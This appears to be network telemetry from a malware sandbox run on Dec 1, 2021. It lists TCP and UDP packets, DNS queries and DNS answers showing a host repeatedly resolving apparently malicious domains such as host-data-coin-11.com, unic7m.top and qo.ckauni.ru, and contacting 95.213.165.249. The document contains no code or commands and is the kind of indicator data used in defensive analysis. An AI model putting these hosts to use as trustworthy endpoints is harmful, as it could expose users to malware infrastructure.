Dec 1, 2021 09:13:57.461519003 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461539984 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461551905 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.461623907 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519202948 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519244909 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519268990 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519292116 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519314051 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519335032 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519350052 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519357920 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519380093 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519401073 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519423008 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519423008 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519445896 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519450903 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519467115 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519475937 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519488096 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519510984 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519519091 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.519532919 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519553900 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.519556999 CET	49763	80	192.168.2.4	95.213.165.249

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 09:13:54.942939997 CET	49257	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:55.257476091 CET	53	49257	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:55.441382885 CET	62389	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:55.461035013 CET	53	62389	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:55.642508030 CET	49910	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:55.969400883 CET	53	49910	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:56.138216019 CET	55854	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:56.157601118 CET	53	55854	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:56.328397989 CET	64549	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:56.616105080 CET	53	64549	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:56.804387093 CET	63153	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:56.823924065 CET	53	63153	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:57.008013010 CET	52991	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:13:57.316086054 CET	53	52991	8.8.8.8	192.168.2.4
Dec 1, 2021 09:13:59.754924059 CET	53700	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:00.066504002 CET	53	53700	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:00.303432941 CET	51726	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:00.588979959 CET	53	51726	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:00.766045094 CET	56794	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:00.785895109 CET	53	56794	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:00.972630978 CET	56534	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:00.995793104 CET	53	56534	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:02.441530943 CET	56627	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:02.461729050 CET	53	56627	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:02.633739948 CET	56621	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:02.651237965 CET	53	56621	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:02.823123932 CET	63116	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:03.133440971 CET	53	63116	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:03.471854925 CET	64078	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:03.491854906 CET	53	64078	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:03.716103077 CET	64801	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:03.733761072 CET	53	64801	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:04.363066912 CET	61721	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:04.381115913 CET	53	61721	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:04.551676035 CET	51255	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:04.572211981 CET	53	51255	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:05.952857971 CET	61522	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:05.972352982 CET	53	61522	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:06.145644903 CET	52337	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:06.165329933 CET	53	52337	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:06.346781969 CET	55046	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:06.366596937 CET	53	55046	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:06.539828062 CET	49612	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:06.827913046 CET	53	49612	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:09.501684904 CET	49285	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:09.521253109 CET	53	49285	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:09.693345070 CET	50601	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:09.711407900 CET	53	50601	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:09.912483931 CET	60875	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:09.932312965 CET	53	60875	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:10.099549055 CET	56448	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:10.119246006 CET	53	56448	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:10.330440998 CET	59172	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:10.350357056 CET	53	59172	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:12.538619041 CET	62420	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:12.558250904 CET	53	62420	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:12.734312057 CET	60579	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:12.752151012 CET	53	60579	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:12.921072960 CET	50183	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:12.940529108 CET	53	50183	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:13.194108963 CET	61531	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:13.212126017 CET	53	61531	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:13.424535990 CET	49228	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:13.746201038 CET	53	49228	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:16.784393072 CET	59794	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:16.803610086 CET	53	59794	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:17.021230936 CET	55916	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:17.041070938 CET	53	55916	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:17.529195070 CET	52752	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:17.547084093 CET	53	52752	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:17.809986115 CET	60542	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:17.829583883 CET	53	60542	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:18.067924023 CET	60689	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:18.087007999 CET	53	60689	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:18.246855974 CET	64206	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:18.266704082 CET	53	64206	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:18.508083105 CET	50904	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:18.823520899 CET	53	50904	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:19.532625914 CET	57525	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:19.821194887 CET	53	57525	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:26.144610882 CET	53814	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:26.432487965 CET	53	53814	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:26.603894949 CET	53418	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:26.621478081 CET	53	53418	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:26.859071970 CET	62833	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:26.878792048 CET	53	62833	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:27.050990105 CET	59260	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:27.087215900 CET	53	59260	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:27.351658106 CET	49944	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:27.370862007 CET	53	49944	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:27.552272081 CET	63300	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:27.572081089 CET	53	63300	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:27.828942060 CET	61449	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:27.848443031 CET	53	61449	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:28.056879997 CET	51275	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:28.076781034 CET	53	51275	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:32.404804945 CET	58945	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:32.424825907 CET	53	58945	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:32.684566021 CET	60779	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:32.704303980 CET	53	60779	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:32.937783003 CET	64014	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:32.957524061 CET	53	64014	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:33.147651911 CET	57091	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:33.167165041 CET	53	57091	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:33.337136984 CET	55904	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:33.356935978 CET	53	55904	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:33.532188892 CET	52109	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:33.848562956 CET	53	52109	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:34.032916069 CET	54450	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:34.053011894 CET	53	54450	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:34.226881981 CET	49374	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:34.246054888 CET	53	49374	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:34.475718975 CET	50436	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:34.494960070 CET	53	50436	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:34.666623116 CET	62605	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:34.686779022 CET	53	62605	8.8.8.8	192.168.2.4
Dec 1, 2021 09:14:34.856899977 CET	54256	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:14:34.874905109 CET	53	54256	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:22.722491026 CET	62992	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:22.740073919 CET	53	62992	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:28.530594110 CET	58383	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:28.607682943 CET	53	58383	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:32.429128885 CET	63409	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:32.448966980 CET	53	63409	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:34.813688040 CET	55601	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:34.920037985 CET	53	55601	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:38.721261978 CET	52984	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:38.836749077 CET	53	52984	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:42.748756886 CET	51141	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:42.855458975 CET	53	51141	8.8.8.8	192.168.2.4
Dec 1, 2021 09:15:46.765213966 CET	53610	53	192.168.2.4	8.8.8.8
Dec 1, 2021 09:15:46.783274889 CET	53	53610	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 09:13:54.942939997 CET	192.168.2.4	8.8.8.8	0x6aa1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:55.441382885 CET	192.168.2.4	8.8.8.8	0xa429	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:55.642508030 CET	192.168.2.4	8.8.8.8	0xc6b7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.138216019 CET	192.168.2.4	8.8.8.8	0x54e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.328397989 CET	192.168.2.4	8.8.8.8	0xcee8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.804387093 CET	192.168.2.4	8.8.8.8	0xba8a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:57.008013010 CET	192.168.2.4	8.8.8.8	0x8eeb	Standard query (0)	host-file-host-3.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:59.754924059 CET	192.168.2.4	8.8.8.8	0x3ae	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.303432941 CET	192.168.2.4	8.8.8.8	0xd3b8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.766045094 CET	192.168.2.4	8.8.8.8	0x489d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.972630978 CET	192.168.2.4	8.8.8.8	0x57f4	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:02.441530943 CET	192.168.2.4	8.8.8.8	0xcd5e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:02.633739948 CET	192.168.2.4	8.8.8.8	0xe5f2	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:02.823123932 CET	192.168.2.4	8.8.8.8	0x306d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:03.471854925 CET	192.168.2.4	8.8.8.8	0x8e30	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:03.716103077 CET	192.168.2.4	8.8.8.8	0xa14c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:04.363066912 CET	192.168.2.4	8.8.8.8	0x4617	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:04.551676035 CET	192.168.2.4	8.8.8.8	0x137b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:05.952857971 CET	192.168.2.4	8.8.8.8	0x1ed6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.145644903 CET	192.168.2.4	8.8.8.8	0x4102	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.346781969 CET	192.168.2.4	8.8.8.8	0x56d0	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.539828062 CET	192.168.2.4	8.8.8.8	0x2116	Standard query (0)	host-file-host-3.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.501684904 CET	192.168.2.4	8.8.8.8	0x257e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.693345070 CET	192.168.2.4	8.8.8.8	0xcd22	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.912483931 CET	192.168.2.4	8.8.8.8	0xe90f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:10.099549055 CET	192.168.2.4	8.8.8.8	0x5d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:10.330440998 CET	192.168.2.4	8.8.8.8	0xd659	Standard query (0)	host-file-host-3.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:12.538619041 CET	192.168.2.4	8.8.8.8	0xc7b8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:12.734312057 CET	192.168.2.4	8.8.8.8	0xf8d1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:12.921072960 CET	192.168.2.4	8.8.8.8	0xcb7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:13.194108963 CET	192.168.2.4	8.8.8.8	0x17fb	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:13.424535990 CET	192.168.2.4	8.8.8.8	0x7729	Standard query (0)	privacytoolzforyou-7000.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:16.784393072 CET	192.168.2.4	8.8.8.8	0x79d6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.021230936 CET	192.168.2.4	8.8.8.8	0x5b4	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.529195070 CET	192.168.2.4	8.8.8.8	0xa2fc	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.809986115 CET	192.168.2.4	8.8.8.8	0xf396	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.067924023 CET	192.168.2.4	8.8.8.8	0xe60d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.246855974 CET	192.168.2.4	8.8.8.8	0xefba	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.508083105 CET	192.168.2.4	8.8.8.8	0x8b16	Standard query (0)	host-file-host-3.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:19.532625914 CET	192.168.2.4	8.8.8.8	0xca4b	Standard query (0)	file-file-host4.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.144610882 CET	192.168.2.4	8.8.8.8	0x9ce9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.603894949 CET	192.168.2.4	8.8.8.8	0x83ac	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.859071970 CET	192.168.2.4	8.8.8.8	0x1eb9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.050990105 CET	192.168.2.4	8.8.8.8	0x5e3c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.351658106 CET	192.168.2.4	8.8.8.8	0x94ce	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.552272081 CET	192.168.2.4	8.8.8.8	0xdf6b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.828942060 CET	192.168.2.4	8.8.8.8	0x2089	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:28.056879997 CET	192.168.2.4	8.8.8.8	0xb273	Standard query (0)	host-file-host-3.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.404804945 CET	192.168.2.4	8.8.8.8	0x6232	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.684566021 CET	192.168.2.4	8.8.8.8	0xad1f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.937783003 CET	192.168.2.4	8.8.8.8	0xb0c8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.147651911 CET	192.168.2.4	8.8.8.8	0xd15c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.337136984 CET	192.168.2.4	8.8.8.8	0xd2fe	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.532188892 CET	192.168.2.4	8.8.8.8	0x336b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.032916069 CET	192.168.2.4	8.8.8.8	0xc2c5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.226881981 CET	192.168.2.4	8.8.8.8	0x3bfc	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.475718975 CET	192.168.2.4	8.8.8.8	0x6f04	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.666623116 CET	192.168.2.4	8.8.8.8	0x4d5f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.856899977 CET	192.168.2.4	8.8.8.8	0xd304	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.722491026 CET	192.168.2.4	8.8.8.8	0xd1c4	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:28.530594110 CET	192.168.2.4	8.8.8.8	0xbb3	Standard query (0)	qo.ckauni.ru	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:32.429128885 CET	192.168.2.4	8.8.8.8	0x1e35	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:34.813688040 CET	192.168.2.4	8.8.8.8	0xe8e8	Standard query (0)	unic7m.top	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:38.721261978 CET	192.168.2.4	8.8.8.8	0xe102	Standard query (0)	unic7m.top	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:42.748756886 CET	192.168.2.4	8.8.8.8	0xe293	Standard query (0)	unic7m.top	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:46.765213966 CET	192.168.2.4	8.8.8.8	0xdee9	Standard query (0)	unic7m.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 09:13:55.257476091 CET	8.8.8.8	192.168.2.4	0x6aa1	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:55.461035013 CET	8.8.8.8	192.168.2.4	0xa429	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:55.969400883 CET	8.8.8.8	192.168.2.4	0xc6b7	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.157601118 CET	8.8.8.8	192.168.2.4	0x54e	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.616105080 CET	8.8.8.8	192.168.2.4	0xcee8	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:56.823924065 CET	8.8.8.8	192.168.2.4	0xba8a	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:13:57.316086054 CET	8.8.8.8	192.168.2.4	0x8eeb	No error (0)	host-file-host-3.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.066504002 CET	8.8.8.8	192.168.2.4	0x3ae	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.588979959 CET	8.8.8.8	192.168.2.4	0xd3b8	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.785895109 CET	8.8.8.8	192.168.2.4	0x489d	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.995793104 CET	8.8.8.8	192.168.2.4	0x57f4	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.995793104 CET	8.8.8.8	192.168.2.4	0x57f4	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.995793104 CET	8.8.8.8	192.168.2.4	0x57f4	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.995793104 CET	8.8.8.8	192.168.2.4	0x57f4	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:00.995793104 CET	8.8.8.8	192.168.2.4	0x57f4	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:02.461729050 CET	8.8.8.8	192.168.2.4	0xcd5e	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:02.651237965 CET	8.8.8.8	192.168.2.4	0xe5f2	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:03.133440971 CET	8.8.8.8	192.168.2.4	0x306d	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:03.491854906 CET	8.8.8.8	192.168.2.4	0x8e30	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:03.733761072 CET	8.8.8.8	192.168.2.4	0xa14c	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:04.381115913 CET	8.8.8.8	192.168.2.4	0x4617	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:04.572211981 CET	8.8.8.8	192.168.2.4	0x137b	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:05.972352982 CET	8.8.8.8	192.168.2.4	0x1ed6	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.165329933 CET	8.8.8.8	192.168.2.4	0x4102	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.366596937 CET	8.8.8.8	192.168.2.4	0x56d0	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:06.827913046 CET	8.8.8.8	192.168.2.4	0x2116	No error (0)	host-file-host-3.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.521253109 CET	8.8.8.8	192.168.2.4	0x257e	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.711407900 CET	8.8.8.8	192.168.2.4	0xcd22	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:09.932312965 CET	8.8.8.8	192.168.2.4	0xe90f	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:10.119246006 CET	8.8.8.8	192.168.2.4	0x5d	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:10.350357056 CET	8.8.8.8	192.168.2.4	0xd659	No error (0)	host-file-host-3.com		95.213.165.249	A (IP address)	IN (0x0001)
